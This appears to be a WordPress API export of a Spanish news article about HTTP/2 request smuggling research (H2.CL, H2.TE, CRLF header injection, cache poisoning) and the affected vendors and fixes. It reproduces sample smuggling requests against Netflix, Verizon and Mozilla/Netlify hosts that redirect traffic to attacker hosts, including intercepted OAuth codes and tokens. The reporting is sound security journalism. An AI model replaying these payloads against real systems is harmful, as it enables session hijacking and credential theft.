{"id":100934,"date":"2021-08-07T16:22:34","date_gmt":"2021-08-07T14:22:35","guid":{"rendered":"https:\/\/prohoster.info\/blog\/novosti-interneta\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy"},"modified":"2026-02-09T17:18:09","modified_gmt":"2026-02-09T15:18:09","slug":"novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","status":"publish","type":"post","link":"https:\/\/prohoster.info\/es\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","title":{"rendered":"Un nuevo ataque a los sistemas frontend-backend, que permite infiltrarse en las solicitudes.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p>Los sistemas web en los que el frontend acepta conexiones mediante HTTP\/2 y las transmite al backend a trav\u00e9s de HTTP\/1.1 est\u00e1n expuestos a una nueva variante de ataque llamada \u00abHTTP Request Smuggling\u00bb, que permite, mediante el env\u00edo de solicitudes de cliente especialmente formateadas, inmiscuirse en el contenido de las solicitudes de otros usuarios que se procesan en el mismo flujo entre el frontend y el backend. Este ataque puede utilizarse para insertar c\u00f3digo JavaScript malicioso en una sesi\u00f3n con un sitio leg\u00edtimo, eludir sistemas de control de acceso y capturar par\u00e1metros de autenticaci\u00f3n.     <\/p>\n<p>El problema afecta a proxies web, equilibradores de carga, aceleradores web, sistemas de distribuci\u00f3n de contenido y otras configuraciones donde las solicitudes se redireccionan en la arquitectura frontend-backend. El autor del estudio demostr\u00f3 la posibilidad del ataque en sistemas de Netflix, Verizon, Bitbucket, Netlify CDN y Atlassian, y recibi\u00f3 56,000 d\u00f3lares en programas de recompensas por la identificaci\u00f3n de vulnerabilidades. La existencia del problema tambi\u00e9n ha sido confirmada en productos de F5 Networks. El problema afecta parcialmente a mod_proxy en el servidor http de Apache (CVE-2021-33193), con correcciones esperadas en la versi\u00f3n 2.4.49 (los desarrolladores fueron notificados del problema a principios de mayo y tuvieron 3 meses para corregirlo). En nginx, la posibilidad de especificar simult\u00e1neamente los encabezados \u00abContent-Length\u00bb y \u00abTransfer-Encoding\u00bb fue bloqueada en la \u00faltima versi\u00f3n (1.21.1). Los medios para llevar a cabo ataques ya han sido a\u00f1adidos al conjunto de herramientas de Burp y est\u00e1n disponibles en forma de una extensi\u00f3n Turbo Intruder.      <\/p>\n<p>El principio de funcionamiento del nuevo m\u00e9todo de inyecci\u00f3n de solicitudes en el tr\u00e1fico es similar a la vulnerabilidad detectada por el mismo investigador hace dos a\u00f1os, pero limitada a los frontends que aceptan solicitudes a trav\u00e9s de HTTP\/1.1. Recordemos que en la arquitectura frontend-backend, un nodo adicional\u2014el frontend\u2014recibe las solicitudes de los clientes y establece una conexi\u00f3n TCP de larga duraci\u00f3n con el backend, que realiza el procesamiento directo de las solicitudes. A trav\u00e9s de esta conexi\u00f3n compartida se suelen transmitir solicitudes de diferentes usuarios, que siguen en cadena unas tras otras, separadas por los medios del protocolo HTTP.     <\/p>\n<p>El ataque cl\u00e1sico de \"HTTP Request Smuggling\" se basa en la forma en que los frontends y backends interpretan de manera diferente el uso de los encabezados HTTP \"Content-Length\" (que determina el tama\u00f1o total de los datos en la solicitud) y \"Transfer-Encoding: chunked\" (que permite enviar datos en partes). Por ejemplo, si el frontend solo admite \"Content-Length\" pero ignora \"Transfer-Encoding: chunked\", un atacante puede enviar una solicitud que incluya simult\u00e1neamente los encabezados \"Content-Length\" y \"Transfer-Encoding: chunked\", pero el tama\u00f1o en \"Content-Length\" no coincide con el tama\u00f1o de la cadena chunked. En este caso, el frontend procesar\u00e1 y redirigir\u00e1 la solicitud de acuerdo con \"Content-Length\", mientras que el backend esperar\u00e1 que finalice el bloque en funci\u00f3n de \"Transfer-Encoding: chunked\", y el resto de la solicitud del atacante aparecer\u00e1 al principio de otra solicitud enviada despu\u00e9s.         <\/p>\n<p>A diferencia del protocolo de texto HTTP\/1.1, cuya interpretaci\u00f3n se realiza a nivel de l\u00edneas, HTTP\/2 es un protocolo binario que manipula bloques de datos de tama\u00f1o previamente especificado. En HTTP\/2, se utilizan pseudo-encabezados que corresponden a los encabezados normales de HTTP. Al interactuar con el backend a trav\u00e9s del protocolo HTTP\/1.1, el frontend traduce estos pseudo-encabezados en encabezados HTTP equivalentes de HTTP\/1.1. El problema es que el backend toma decisiones sobre el an\u00e1lisis del flujo \u00fanicamente basado en los encabezados HTTP que el frontend ha establecido, sin tener informaci\u00f3n sobre los par\u00e1metros de la solicitud original.      <\/p>\n<p>Incluso en forma de pseudo-encabezados pueden transmitirse los valores \"content-length\" y \"transfer-encoding\", a pesar de que en HTTP\/2 no se utilizan, ya que el tama\u00f1o de todos los datos se determina en un campo separado. Sin embargo, durante el proceso de conversi\u00f3n de una solicitud HTTP\/2 a HTTP\/1.1, esos encabezados se transfieren y pueden confundir al backend. Se destacan dos variantes principales de ataque: H2.TE y H2.CL, en las que el backend es enga\u00f1ado por un valor incorrecto de transfer-encoding o content-length que no corresponde al tama\u00f1o real del cuerpo de la solicitud recibida por el frontend a trav\u00e9s del protocolo HTTP\/2.    <center><img decoding=\"async\" alt=\"Un nuevo ataque a los sistemas frontend-backend, que permite infiltrarse en las solicitudes.\" src=\"\/wp-content\/uploads\/2021\/08\/1ea8d97902bf7c4281adce29351c96fc.png\" style=\"display:block;margin: 0 auto;\" \/><\/center>      <\/p>\n<p>Como ejemplo del ataque H2.CL, se menciona la especificaci\u00f3n de un tama\u00f1o incorrecto en el pseudo-encabezado content-length al enviar una solicitud HTTP\/2 a Netflix. Esta solicitud provoca la adici\u00f3n de un encabezado HTTP similar, Content-Length, al hacer la llamada al backend a trav\u00e9s de HTTP\/1.1, pero dado que el tama\u00f1o en Content-Length es menor que el real, parte de los datos al final se procesan como el inicio de la siguiente solicitud.     <\/p>\n<p>Por ejemplo, la solicitud HTTP\/2       :method\tPOST     :path\t\/n     :authority\twww.netflix.com     content-length\t4     abcdGET \/n HTTP\/1.1     Host: 02.rs?x.netflix.com     Foo: bar      <\/p>\n<p>Provocar\u00e1 que se env\u00ede al backend la solicitud:         POST \/n HTTP\/1.1     Host: www.netflix.com     Content-Length: 4       abcdGET \/n HTTP\/1.1     Host: 02.rs?x.netflix.com     Foo: bar    <\/p>\n<p> Dado que Content-Length tiene un valor de 4, el backend solo ver\u00e1 \"abcd\" como el cuerpo de la solicitud, mientras que el resto de \"GET \/n HTTP\/1.1...\" ser\u00e1 procesado como el inicio de la siguiente solicitud que pertenece a otro usuario. Como resultado, se producir\u00e1 una desincronizaci\u00f3n del flujo y, como respuesta a la siguiente solicitud, se emitir\u00e1 el resultado del procesamiento de la solicitud falsa. En el caso de Netflix, la especificaci\u00f3n de un host externo en el encabezado \"Host:\" en la solicitud falsa llev\u00f3 a que el cliente recibiera la respuesta \"Location: https:\/\/02.rs?x.netflix.com\/n\" y permiti\u00f3 que se le enviara contenido arbitrario, incluida la ejecuci\u00f3n de su c\u00f3digo JavaScript en el contexto del sitio de Netflix.      <\/p>\n<p>La segunda variante del ataque (H2.TE) est\u00e1 relacionada con la inserci\u00f3n del encabezado \u00abTransfer-Encoding: chunked\u00bb. El uso del pseudo-encabezado transfer-encoding en HTTP\/2 est\u00e1 prohibido por la especificaci\u00f3n, y las solicitudes que lo contengan deben ser tratadas como incorrectas. Sin embargo, algunas implementaciones de frontends no tienen en cuenta este requisito y permiten el uso del pseudo-encabezado transfer-encoding en HTTP\/2, que se convierte en un encabezado similar de HTTP. Con el encabezado \u00abTransfer-Encoding\u00bb, el backend puede considerarlo como m\u00e1s prioritario y realizar el an\u00e1lisis de datos en partes en modo \u00abchunked\u00bb utilizando bloques de diferente tama\u00f1o en el formato \u00ab{tama\u00f1o}\r\n{bloque}\r\n{tama\u00f1o}\r\n{bloque}\r\n0\u00bb, a pesar de la divisi\u00f3n inicial por el tama\u00f1o total.    <\/p>\n<p>La existencia de tal vulnerabilidad se demostr\u00f3 en el caso de la empresa Verizon. Esto afect\u00f3 al portal de autenticaci\u00f3n y <a href=\"https:\/\/prohoster.info\/es\/hosting\/hosting-wordpress\/\"  data-wpil-monitor-id=\"1168\">del sistema de gesti\u00f3n de contenido<\/a>, que tambi\u00e9n se utiliza en sitios como Huffington Post y Engadget. Por ejemplo, la solicitud del cliente por HTTP\/2:       :method\tPOST     :path\t\/identitfy\/XUI     :authority\tid.b2b.oath.com     transfer-encoding\tchunked      0       GET \/oops HTTP\/1.1     Host: psres.net     Content-Length: 10       x=    <\/p>\n<p>Se llev\u00f3 a cabo la transmisi\u00f3n de un request al backend en HTTP\/1.1: POST \/identity\/XUI HTTP\/1.1 Host: id.b2b.oath.com Content-Length: 66 Transfer-Encoding: chunked 0 GET \/oops HTTP\/1.1 Host: psres.net Content-Length: 10 x=      <\/p>\n<p>El backend, a su vez, ignor\u00f3 el encabezado \u00abContent-Length\u00bb y realiz\u00f3 la divisi\u00f3n en el flujo basado en \u00abTransfer-Encoding: chunked\u00bb. En la pr\u00e1ctica, el ataque permiti\u00f3 redirigir las solicitudes de los usuarios a su propio sitio y, adem\u00e1s, interceptar las solicitudes relacionadas con la autenticaci\u00f3n OAuth, cuyos par\u00e1metros aparec\u00edan en el encabezado Referer, as\u00ed como simular una sesi\u00f3n de autenticaci\u00f3n e iniciar el env\u00edo de las credenciales del usuario al host del atacante. GET \/b2blanding\/show\/oops HTTP\/1.1 Host: psres.net Referer: https:\/\/id.b2b.oath.com\/?\u2026&amp;code=secret GET \/ HTTP\/1.1 Host: psres.net Authorization: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik\u2026        <\/p>\n<p>Para atacar implementaciones de HTTP\/2 que no permiten la especificaci\u00f3n del pseudo-encabezado transfer-encoding, se propuso otro m\u00e9todo relacionado con la inserci\u00f3n del encabezado \u00abTransfer-Encoding\u00bb a trav\u00e9s de su adici\u00f3n a otros pseudo-encabezados separados por un s\u00edmbolo de nueva l\u00ednea (al convertirse en HTTP\/1.1 en tales casos se crean dos encabezados HTTP separados).     <\/p>\n<p>Por ejemplo, esta problem\u00e1tica afect\u00f3 a Atlassian Jira y a Netlify CDN (utilizado para servir la p\u00e1gina de inicio de Mozilla en Firefox). En particular, la solicitud HTTP\/2 :method\tPOST :path\t\/ :authority\tstart.mozilla.org foo\tb\r\n transfer-encoding: chunked 0\r\n \r\n GET \/ HTTP\/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r\n x=    <\/p>\n<p>provocaba el env\u00edo al backend de la solicitud HTTP\/1.1 POST \/ HTTP\/1.1\r\n Host: start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding: chunked\r\n Content-Length: 71\r\n \r\n 0\r\n \r\n GET \/ HTTP\/1.1\r\n Host: evil-netlify-domain\r\n Content-Length: 5\r\n \r\n x=      <\/p>\n<p>Otra forma de suplantar el encabezado &#171;Transfer-Encoding&#187; fue adjuntarlo al nombre de otro pseudo-encabezado o a la l\u00ednea del m\u00e9todo de solicitud. Por ejemplo, al acceder a Atlassian Jira, el nombre del pseudo-encabezado &#171;foo: bar&#092;r&#092;ntransfer-encoding&#187; con el valor &#171;chunked&#187; result\u00f3 en la adici\u00f3n de los encabezados HTTP &#171;foo: bar&#187; y &#171;transfer-encoding: chunked&#187;; mientras que especificar en el pseudo-encabezado &#171;:method&#187;\t el valor &#171;GET \/ HTTP\/1.1&#092;r&#092;nTransfer-encoding: chunked&#187; se tradujo en &#171;GET \/ HTTP\/1.1&#092;r&#092;ntransfer-encoding: chunked&#187;.     <\/p>\n<p>El investigador que identific\u00f3 el problema tambi\u00e9n propuso una t\u00e9cnica de tunelizaci\u00f3n de solicitudes para llevar a cabo un ataque a los frontales, en los cuales para cada <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/es\/lir\/ipv4\/\"   title=\"IP\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"688\">IP<\/a> se establece una conexi\u00f3n separada con el backend y el tr\u00e1fico de diferentes usuarios no se mezcla. La t\u00e9cnica propuesta no permite interferir en las solicitudes de otros usuarios, pero ofrece la posibilidad de envenenar la cach\u00e9 compartida, lo que afecta al procesamiento de otras solicitudes, y permite realizar sustituciones de los encabezados HTTP internos que se utilizan para transmitir informaci\u00f3n de servicio del frontend al backend (por ejemplo, durante la autenticaci\u00f3n en el lado del frontend, se pueden transmitir al backend detalles sobre el usuario actual en dichos encabezados). Como ejemplo de aplicaci\u00f3n del m\u00e9todo en la pr\u00e1ctica, se logr\u00f3 obtener control sobre las p\u00e1ginas en el servicio Bitbucket mediante el envenenamiento de la cach\u00e9.<br \/>\n<br \/>Fuente: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/www.opennet.ru\/opennews\/art.shtml?num=55601\">opennet.ru<\/a> <\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &#171;HTTP Request Smuggling&#187;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0432\u043a\u043b\u0438\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u044b\u0445 \u0432 \u0442\u043e\u043c \u0436\u0435 \u043f\u043e\u0442\u043e\u043a\u0435 \u043c\u0435\u0436\u0434\u0443 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434\u043e\u043c \u0438 \u0431\u044d\u043a\u0435\u043d\u0434\u043e\u043c. \u0410\u0442\u0430\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u0434\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e JavaScript-\u043a\u043e\u0434\u0430 \u0432 \u0441\u0435\u0430\u043d\u0441 \u0441 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u043c [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":100935,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[702],"tags":[],"class_list":["post-100934","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/es\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"es_ES\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/es\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2021-08-07T14:22:35+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-02-09T15:18:09+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Nuevo ataque a sistemas frontend-backend que permite infiltrarse en las solicitudes | ProHoster","description":"Los sistemas web en los que el frontend acepta conexiones por HTTP\/2 y las retransmite al backend por HTTP\/1.1 se han visto afectados por una nueva variante de ataque \"HTTP Request Smuggling\", que permite enviar solicitudes especialmente formateadas.","canonical_url":"https:\/\/prohoster.info\/es\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"es_ES","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434-\u0431\u044d\u043a\u0435\u043d\u0434, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u043a\u043b\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u044b | ProHoster","og:description":"Web-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0440\u043e\u043d\u0442\u044d\u043d\u0434 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u043f\u043e HTTP\/2 \u0438 \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442 \u0431\u044d\u043a\u0435\u043d\u0434\u0443 \u043f\u043e HTTP\/1.1, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.","og:url":"https:\/\/prohoster.info\/es\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2021-08-07T14:22:35+00:00","article:modified_time":"2026-02-09T15:18:09+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"100934","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-08-07 15:27:20","updated":"2026-02-09 15:18:09","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/100934","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/comments?post=100934"}],"version-history":[{"count":2,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/100934\/revisions"}],"predecessor-version":[{"id":158412,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/100934\/revisions\/158412"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/media\/100935"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/media?parent=100934"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/categories?post=100934"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/tags?post=100934"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}